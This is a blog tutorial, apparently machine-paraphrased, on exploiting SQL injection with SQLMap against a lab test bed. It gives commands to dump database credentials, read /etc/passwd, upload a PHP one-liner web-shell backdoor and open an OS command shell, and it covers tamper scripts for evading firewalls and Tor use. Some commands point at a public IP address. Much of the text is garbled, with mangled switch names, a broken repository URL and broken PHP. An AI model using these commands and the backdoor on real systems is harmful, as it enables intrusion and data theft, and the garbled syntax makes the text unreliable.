Web applicatio penetration testing tutorial Exploiting SQL injection Attack

 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Web Application Penetration Testing Tutorial - Exploiting SQL Injection Attack


In this Web Application Penetration Testing Tutorial, we are learning different ways to take advantage of popular The vulnerability is known as SQL Injection, which I think most readers are familiar with.

A SQL Injection flaw simply allows an attacker to inject or tamper with parts Query database in a web application to perform attacker-specific tasks Such as exclusion of data, write or receive files for database servers Server-side code execution.

I'm going to cover this section primarily through an industry-grade tool that exploits SQL Injection defects; The tool is called SQLMap

SQLMap is powerful and versatile Dynamically detect and open source tools written by Bernardo and Miroslav Take advantage of SQL injection issues. 

The device supports the following list of built-in DBMS Software is used in various Web Applications - MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, and HSQLDB The main focus will be on the Linux / PHP / MySQL stack because it is still the most common web app stack we see these days.

Some of the SQLMap features are some of which are the following:
  • Support for various types of SQL injection techniques:
  1. Error based injection
  2. Blind injection
  3. Time-based injection
  4. Stacked questions
  • Working as a database client if proper credentials are provided
  • Downloading and uploading files to a database server
  • Ability to detect databases, tables and columns individually
  • Built-in support for cracking a normal hash like MD5
  • Support for Metastream Structure
  • Code execution using DBMS features such as xp_cmdshell
There are several more wings in the cap of SQLMap. We will walk through them During this tutorial.

We are going to cover the following topics:
  • Installing SQLMap under Black Linux
  • Introduction to SQLMap
  • Dumping data (in the error-based scenario)
  • SQLMap and URL Rewrite
  • Accelerate the process
  • Dumping data (in blind and time-based scenarios)
  • Read and write files
  • Handling injections in POST request
  • SQL shell
  • Open the command
  • Theft - tampering script

Installation of SQLMap in Kali Linux

Although SQLMap is preinstalled in Kali Linux, it is a very small cart and not at all Recommended for real-world use. That being said, we will go ahead and establish the Fixed version of SQLMap from their GitHub page:

https://github.com/sqlmapproject/sqlmap/releases

At the time of writing it, the current stable version was 1.0, which was released February 27, 2016, and can be downloaded from this link:

https://github.com/sqlmapproject/sqlmap/archive/1.0.zip

Let's fire a terminal and download this zip through wget and remove it with Unzip as follows:


wget https://github.com/sqlmapproject/sqlmap/archive/1.0.zip -O sqlmap.
zip
unzip sqlmap.zip

If you want the latest development version of SQLMap, it can be dragged through Their GitHub is as follows:

git clone https://github.com/sqlmapproject/sqlmap.it sqlmap-dev
Once done, we can change our directory to sqlmap directory and run it The following tools:


./sqlmap.py -h

Let's see what you get!


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

We have it there! Installation is successful. We can clearly see the support banner Sqlmap A full list of SQL DAD commands can be found in README.pdf SQLMap's Doctor Directory.

Introduction to SQLMap

In further demonstrations, I have used an open-source test bed
Audi-1 from Github, which can be downloaded at https://github.com/Audi-1/ SQLI-Labs The test bed is run on Ubuntu and LAMP stacks. For the sake of Performance, let's say we have the following IP configuration:

  • The attacker's IP: 192.168.50.3
  • Test-bed IP: 192.168.50.2

Let me showcase the best bed first - it takes a GET parameter named ID and displays the username and password value for it. Let us see the scrolling screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

For 192.168.50.2/Less-1/?id=1, this first showed value for the user.

Similarly, if we increase the ID parameters, then we will see different user names/passwords. Pairs, such as ID = 2 which can be seen in the following screenshots:

 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

And yes, as you expected, we get a classic MySQL error that tells us Something weird, and possibly an error-based SQL injection is.

Let's fire up SQLMap and try to figure out whether it is absorbent:


./sqlmap.py -u http://192.168.50.2/Less-1/?id=2

SQLMap throws a good output in which it has been suggested that the ID is unsafe for a SQL injection with an error and the backend is DB MySQL. As you might have understood, -u is used to supplying the SQLMap URL, and the GET parameter is selected Out of it; 

But if there are many parameters to look for, we can use the -p Specify the magnitude in which to see which parameter in SQLMap. The following screenshots show us:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

As a bonus, it warns us that the parameter is also susceptible to XSS vulnerability:

[Information] The heretical (XSS) test shows that GES parameter 'ID' can be unsafe for XSS attacks


When the phase of detection expires, Output also shows us the diversity of methods in which we can take advantage of this flow. We can see from the following screenshots that for detailed output, consisting of exploitation options, testing of payloads and simultaneously using the web application's left architecture:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Now it is clear that we can take advantage of it using error-based technology. But before that, I will navigate through different types of settings, which we can use.

Injection Techniques

SQLMap --technique supports the use of a specific technique of exploitation by command-line switches. The following table lets you run through different options or their combination:


Letter Technique
B Boolean-based blind or simply blind injection
E Error-based injection
U UNION-query based injection
S Stacked queries
T Time-based injection
Q Inline queries

By default, SQLMap selects usable technology; But it is a good idea that if there are any anomalies or if the SQLMap data is unable to dump automatically, then one of these options is to manually force SQLMap.

Dumping the data – in an error-based scenario

Let's go back to the previously discussed example, and now we will take advantage of the list of database users and databases using the SQLMap's error-based technique as follows:


./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 --current-user

The output is shown in the following screenshot;


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Impressive! The current database user root is pointing to by SQLMap.

Now we print the list of present databases using the --dbs switch in this way:


./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 --dbs

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Once we have the list of databases available, it may be a good idea to dump one of them.

For display, I will select the protection and will take out the tables present in this. Provides a switch to give SQLMap-tables the same list, but it must be used Parallel with the -d switch, which tells which database to choose when dumping The tables are as follows:



./sqlmap.py --technique=E -u http://192.168.50.2/Less-1/?id=2 -D security
--tables  

 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack


Now when the tables are in our disposal, we dump data from users' tables.

-D-and -t will use the -dump switch, which is used to dump
The data from databases and table names respectively are as follows:

./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 -D Security -T User: -dump

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Notice that we successfully dump data from the table. Sometimes it is possible that we are interested only in a specific column and not for everyone them. 

For example, in the previous image, we only want to remove the username And do not want to waste time in the dump the password column, and the ID column.

We can use a switch to select and dump from specific columns but initially, we will do Use - columns to actually print column names without dumping the table, and Then use the -C to select specific column names.

Firstly, we should print the name of the column in such a way as:

./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 -D Security -T user --columns

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

great! We got the exact column structure, now let us know the username and The password column and dump only these two columns are as follows:

./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 -D Security -T user -C "username, password" --dump

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

We have it there! This data output is only with username and password Columns As you can see from the syntax, the option separates comma Value (CSV) column names

Interacting with the wizard 

If the previous luggage looks complicated, then for basic familiarity, A Interactive setup wizard where SQLMap asks for detail about things, one by one, The injection begins with the URL.
 invites the switch wizard. 

The wizard then asks for the information seen in the following screenshot:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

It produces an original output based on the chosen setting, such as the current user, the current database that was injectable, and whether or not the current user database administrator (DBA), as shown in the following details:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Dump Everything!

Is an SQLMap option whose name is -dump-all which dumps all the data present Inside every single database accessible through injection, (including the default) Databases such as info_schema) are as follows:

./sqlmap.py -u http://192.168.50.2/less-1/?id=2 --dump- all

This command will remove everything accessible through injection. Dumping All databases take a long time, and are generally not recommended. 

It can also be  If server resources are interrupted, interrupt web applications.

SQLMap and URL Rewriting

In the previous example, these parameters were very clear but this is always Questions on the possibility of rewriting URLs in your mind (mod_rewrite and others), And how SQLMap can handle this situation. 

Then SQLMap offers to its users With the option to specify the injection point. If supplied anywhere in the URL If the SQLMap contains an asterisk (*), then that point will be used as an injection
The point and the SQLMap will begin to detect your injection from there.

Let us see this in action:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

As you can see, SQLMap immediately pointed to the fact that the bass has been found in the URL near a custom injection marker, and asks if it should be preceded by the URL. 

So with this technique, we can easily inject the website with the URL rewrite module easily.

Speeding up the process! 

Up to now, we have only seen the single-threaded operation of the old school of SQLMap, But in real life, we ​​may need to speed up these things because there can be hundreds of Rows inside a table, if not thousands, Using a formula and any method Optimizing the dumping process will take forever to complete SQLMap.

Fortunately, SQLMap developers have provided us four types of customizations The techniques are as follows:

  • Multi-threading
  • Faucet connection
  • HTTP Constant Connection
  • Output prediction

Multiple threading

As we have already mentioned, SQLMap runs on only one thread, which is Slow We can use the thread switch and specify the value for the number Thread, which is from 1 to 10. Increasing thread count can increase dramatically Increasing overall performance of SQLMap.

Let's try that out First try to dump all the tables under database security With the usefulness of time to track and monitor - without the Threads option Time, as follows:

time ./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 -D security --dump

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Now try to do the same with the counting of three threads:

time ./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 -D security

- thread 3

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

You can see that the time spent running with the additional thread is reduced.

Null Connection

The complete connection option in SQLMap actually tries to take advantage of the injection without retrieving the full HTML entity of the target; 

Instead, it uses different HTTP properties such as range and HEAD to retrieve a certain section of the HTML body, or the junk bus mentions the response length of the Dartmine TRUE and FALSE conditions, which are common in visually impaired SQL injection. 

The NULL connection is enabled by the -null-connection command-line switch.

HTTP persistent connections

By default, SQLMap closes, opens and restores the connection to the target server according to your requirement, but it can sometimes make a bit of overhead. 

If there is an overhead, it can be optimized using the --keep = alive switch, which uses the HTTP's constant connection mechanism, and the data is exchanged on a loud speed open connection.

Output prediction

To further speed things forward, SQLMap takes a very novel approach. It uses a table of pre-compiled datasets, in which the normal output is found during SQL injection. 

It may seem strange, but speaking classically, the name of the column, and so on, be very similar if the table is of a general subject, then tell the table the login information. 

Then it is very clear that the password column name will usually be nearby, passwords, secret, hashes, and the column to store the user name, user name, user or username, SQLMap exploits this fact and is already prepared Use the list to predict values ​​using different statistical algorithms. 

It is worth noting that this is another super powerful way to optimize the blind SQL injection attack.

Basic optimization flags 

SQLMap offers the option to turn some flag on display
Optimize using the -o switch These flags will be enabled as follows:
  • --keep-alive
  • --null-connection 
  • --threads 3

It basically enables continuous connections, NULL connections and many more Threads to three This setting may be able to get rudimentary performance Benefits in some types of injections, which are error-based.

Dumping the data – in blind and time-based scenarios

Now, we've looked at error-based technologies, let's focus on using SQLMap Boolean blind technology and time-based technology.

The big problem we face when using blind and time-based exploitation The fact is that there is no verbose database error, and if the query result is successful (True) then the appropriate result is displayed on the page, or there is a blank area, In this case, it is displayed that the result is wrong.

Despite this, the process of extracting data remains the same as I
As explained earlier, and SQLMap has various customization features that we
Will use here

The scenario will be a classic blind / time-based injection in which we will not have any facility.

If the query is TRUE, then the web application throws output as shown The following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

In this case that the query is FALSE, it throws the output as shown in the following screenshot;


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

If there is no error, then this is a classic blind injection. The biggest problem with blind injection is the fact that the data cannot be easily removed because in case of error injection. 

This all boils down to true and wrong reaction behavior game
Target Web App to Determine Values If we are using time-based
To take advantage of it, it will take even more time as it is time-based TRUE and FALSE situations are examined against response times And when some data exists on the basis of difference of reaction time Confirm or reject Keep in mind that there are some injections that can only happen Exploited using a time-based approach.

Let's try to exploit SQLMap and take advantage of this injection as follows:

./sqlmap.py -u http://192.168.50.2/Less-8/?id=2

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

The injection is a blind /time-based confirmation by SQLMap. Let's see how much time we took to dump the same table that we did earlier in the following error-based example:

time ./sqlmap.py -u http://192.168.50.2/Less-8/?id=2 -D security -T users --dump

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

The time taken for dumping the same table in the error-based scenario was nearly two In seconds and in this case, it is approximately 20 seconds. 

Now we can customize the process Using the previously outlined NULL connections and output predictions. 

We can cut a lot by using --null-connection and predict-output
The following time is as follows:

time ./sqlmap.py -u http://192.168.50.2/Less-8/?id=2 -D security -T users --dump --predict-output

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Reading and writing files

DBMS systems provide many features these days, one of which includes capacity Read and write files from file system In a classic web application architecture, As shown in this form, one is for the database server and the web server Runs on different boxes, but there are instances when both are run on the same box And share the same underlying file system. 

If there is a SQL injection and enough Conditions (DB Privileges, File Permissions) are completed, then we can also upload one
Open back doors or read / download server configurations or files whose locations are Generally predefined:

 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack
A simple web application architecture

Checking Privileges

Using a similar error-based example, let's first see if the database user has or not File privileges or not. To achieve this we will use the -privileges switch in SQLMap is as follows:

./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 --privileges 

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

As highlighted in the previous screenshot, you can see that the user has the file Available Privileges, and we can use it to read/write files from injection If file system permissions allow it; Runs a separate user account for MySQL Read / write files for filesystems in Linux.

Reading Files

Let's try to read a common file under the Linux server which is called /etc /passwd. We will use - -file-read switch in SQLMap then the complete path to the file we want
download:

./sqlmap.py -u http://107.170.95.147/Less-1/?id=1 --file-read=/etc/passwd 

The output is shown in the following screenshots


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

SQLMap successfully reads the file, displays it, and saves it for later use.

Reading files from SQLMap can really be beneficial - sometimes we can get direct Database credentials from the configuration files of a web application; 

In general, The location of the configuration file is widely known for popular applications. 

Sometimes this may be a good practice to estimate the location of the configuration file In paths such as /var/www/config.inc, /var/www/html/config/config.inc.php, and so on.

Writing Files

We just saw how to read a file with SQLMap, now discuss writing files The ability of SQLMap As mentioned earlier, if we have access to proper writing Directory on the target server so we can successfully upload/write a file. 

sqlmap --file-write (the location of the local file to upload) and --filed (the location of the file to write on the target server).

For display purposes, I have created a file locally at /root/sqlmap-1.0/ Content packed with Hello world! And upload it to target / var / www / The packt.html folder is as follows:

/sqlmap.py -u http://107.170.95.147/Less-1/?id=1 --file-write=/root/ sqlmap-1.0/packt --file-dest=/var/www/packt.html

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

As reported by SQLMap, we have successfully uploaded the file to the web server's documentation route. Let's verify it on a browser. It's a surprise for you!


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

sweet! File is now live. Moving forward one step, upload a PHP one-liner backdoor via SQLMap as follows:

PHP One-liner shell: <? Php system ($ _ [1337]); ?>.

./sqlmap.py -u http://107.170.95.147/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/shell-php.php


The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

SQLMap reports that the upload is successful.

Let's try to reach our shell and execute some Linux commands such as IDs.


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Great, we have shell access to the server.


While uploading backdoor shells, the ability to write file is very useful, Phishing page and so on Keep in mind that if there is a GET injected Parameter should be less than the maximum length of the file The length of the URL allowed by the webserver. 

For Apache HTTP, default Maximum URL length is 8 kilobytes, so files less than this can be uploaded Move it, However, the penetration testers usually upload in a small PHP script Documents Route of the Web Server provides the functionality to upload more files To bypass the URL length limit. 

This includes a POST parameter for injection should be no problem. Being told, let's discuss how to deal with scenarios Includes a POST parameter.

Handling Injections in a POST Request 

Now the unit, we are considered as an injection only in GET requests/paymeter. Now let's look at injection in a POST parameter and take advantage of it with SQLMap.

In the user name field, we try to insert a horror character to break the query as we did earlier. Let's see what happens:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Upon submission of work, we get a normal MySQL error:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Now we need to see which POST parameter is affected. To view the request we will use the Firefox add-on, known as Live HTTP Headers, which can be easily installed from the Firefox add-on gallery, as shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Therefore, based on the output of live HTTP headers, the affected parameter is unnamed. 

Let's go Use the SQLMap -Data switch to take advantage of this POST-based scenario. The syntax is slightly Difficult to understand at first. It reads: -u <POST-URL> --data = "POST-parameter".

We will check to uninstall the parameter and pass POST parameters inside - Donor, see the following:

./sqlmap.py -u http://192.168.50.2/Less-11/ --data "uname=test&passwd=&su bmit=Submit" -p uname

Let's try it in SQLMap. Here you can see:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Consider that SQLMap exploited the same level of access as was done in GET-based injections.

Another way to exploit this is to capture the POST request and specify the parameter manually. Let's first write the full POST request in a file called a package-demo-post as shown in the following screenshot;


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Now we have saved the request. We will use the -r switch to read the HTTP request from the aforementioned file and then specify the unsafe parameter, which is named in our case through the -p switch.

Let's fire SQLMap and hit the following syntax in black to complete it:

./sqlmap.py -r packt-demo-post.txt -p uname

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

and then! Through this technique, we achieved the same result but
A different way I displayed it through a file because when it can be used The exploitation of SQL injection which is not straightforward; When the payload is SOAP (XML-based) or JSON, then we can use the same -r switch and feed the request
Take advantage of SQLMap and injection through a file.

SQL Injection Inside a Login-Based Portal 

There are incidents in which SQL injection is searched within a portal After the login phase after the supply of username and password values.

Most web applications handle this type of authorization via HTTP
Cookies and we can supply SQLMap with an authorized login HTTP cookie To successfully log in and take advantage of SQL injection. 

Let's try to Think of it with an example.

Http://admin.example.com has an administrative portal and it asks for one Login for a particular user. 

After the user logs in, the portal provides separately Features like employee payroll management, and you find a SQL

The injection is within the same, but since the injection post-login phase is in SQLMap Just cannot figure it out, let alone start to take advantage of it. However, there is a switch in it SQLMap - cookie, which takes HTTP cookie as input - here we can provide Provide the session cookie for the user and then the injection via SQLMap.

The cookie can be captured with any blocking proxy such as Burp Suite or Charles Viewed in the following:

Login URL after example: http://admin.example.com/portal/names?id=1
Using SQLMap (with cookies):

./sqlmap.py --cookie="PHPSESSID=asafa76asfujaf8ajsfj26h6" –u "http:// admin.example.com/portal/names?id=1"


So far, you will understand the whole idea behind the --cookie switch Sqlmap Likewise, you can look around for the Oath-Cred and Oath-type Switches that are useful in tackling other types of authority, such as HTTP Original Authority

SQL Shell

One of the coolest features in SQLMap is the SQL Shell. SQL Shell originally invokes Built-in SQL Interactive Interpreter and it has been presented in such a way that it feels like Like a conversation with a database SQL utility

Interpreter - using the SCL-Shell. Let's look at it like this:

./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 --sql-shell

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

This example makes data retrieval so easy with injection. However,
There are some quirks with this. Since most SQL injection issues are usually based On selected queries, SQL Shell can not work with other types of options Unless the appropriate type of injection is available, INSERT, UPDATE, etc.

Such as stacked queries.


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

As I have already said, I tried to execute an INSERT-based SQL statement, but this did not work because there was no stacked query injection available.

Command shell 

As we discussed earlier in the written file section, we can easily upload a backdoor Find a shell and a shell in a server-side host language. But SQLMap takes this thing At a new level, simply automate this approach automatically. 

We can call clearly Use the os-shell for an interactive command-line shell. SQLMap tries to Upload reverse shell bets to your backdoor in the root of the webserver, and If things go smoothly then it opens us an interactive command line of the target.

Although sometimes it can take a different approach in MS-SQL
The system can try to use xp_cmdshell stored procedure first to get it Code Execution.

Let's look at it like this:

./sqlmap.py -u http://107.170.95.147/Less-1/?id=1 --os-shell 

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Once this is done, SQLMap tries to upload your bets and gives an interactive return.

Open for webserver This feature of SQLMap is superb and easily allows us to get a shell

In some cases, we may need to execute only one order and one
Completely opening the command line cannot be viable. 

SQLMap has an option to Perform a command on the target system and return the output. 

Is done through this Command after the --os-cmd switch Let's look at it like this:

./sqlmap.py -u http://107.170.95.147/Less-1/?id=1 --os-cmd "uname -a" 

The output is shown in the following screenshots:

 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

Similarly, other commands can be executed in this non-interactive manner.

Evasion – tamper scripts 

The tampering script is basically used in simple filters and web theft Application firewall (WAFs). 

They are a collection of in-built scripts Modify the injection vector used by SQLMap. There are cases when WAF is detected
The injection vector and block the whole process. 

The following table gives a brief description of various tampering scripts and their usage. The broad table was Complete credit goes to http://www.forkbombers.com/, produced by Jake Rogers.


Name Description
apostrophemask.py Replaces the apostrophe character with its UTF-8 full width counterpart.
apostrophenullencode.py Replaces the apostrophe character with its illegal double unicode counterpart.
appendnullbyte.py Appends the encoded NULL byte character at the end of the payload.
base64encode.py Base64 all characters in a given payload.
between.py Replaces greater than operator (>) with NOT BETWEEN 0 AND #.

Now let's try and run a script called charencode.py, which changes the blank space Space with a + signal. To run the temper script mechanism, we will use --tamper Switch with the name of the script, which is the charge node in this case. otherwise also
Use the level of verb-ver3 to see exactly which payload was modified.

The script for tampering is as follows:

./sqlmap.py -u http://192.168.50.2/Less-1/?id=2 --tamper charencode -v3 

The output is shown in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

We can see that the data outlined in the [PAYLOAD] sections of the output are URL-encoded according to charencode.py tamper script. Without the tamper script the payload is sent to raw, as we see in the following screenshots:


 Web Applicatio Penetration Testing Tutorial - Exploiting SQL Injection Attack

The tampering script is very experimental and should be used. They may be on Time does not work as expected. But they can sometimes be useful for theft.

Configuring with Proxies 

It is common to use a fixed IP address when conducting admission tests Due to a variety of issues, different types of testing and exploitation techniques From oblivion to legal aspects

SQLMap provides a --proxy switch to pass a URL of an HTTP proxy. Try to do Understand it

A valid proxy is in the form of http: // url: port. Assuming that our proxy is on https://proxy.example.com:8080 We use the --proxy switch as follows:

./sqlmap.py --proxy="https://proxy.example.com:8080" -u "http://vuln. com/?id=1

There is another switch like this, which is called --tor which allows you to Configure TorMap with Tor Network

Summary

This tutorial covers various methods in which we can use SQLMap to exploit Flaws of SQL Injection is an important issue from a security perspective and Most violations and data leaks we see today, as a result of this. 

For extra By reading I would like to suggest a book called SQL injection attacks and defense.

There are some great switches in SQLMap like --levels and --ris who can Be seen; During this viewing, SQLMap provides additional testing for performance 

For injection points; Some switches are more elite, such as os-pwn Opens an instant Meterpreter of Metasploit. Please read them 
officials Documentation in which the whole set of SQLMap switches is mentioned; It is available here:

https://github.com/sqlmapproject/sqlmap/wiki/Usage

Summary

IN this Web Application Penetration Testing Tutorial we learned about all techniques used in SQL Injection.

The next tutorials will deal with security vulnerabilities in file uploads Functionality is a very common part of web application these days.

Related:


Hi'i'm Rahim Ansari ,from India, I Love to Blogging, Desing Website, Web Developing and Desiging I Like to Learn and share Technical Hacking/Security tips with you,I Love my Friends.

Please Ask Question on Comment Box

Related Posts

Previous
Next Post »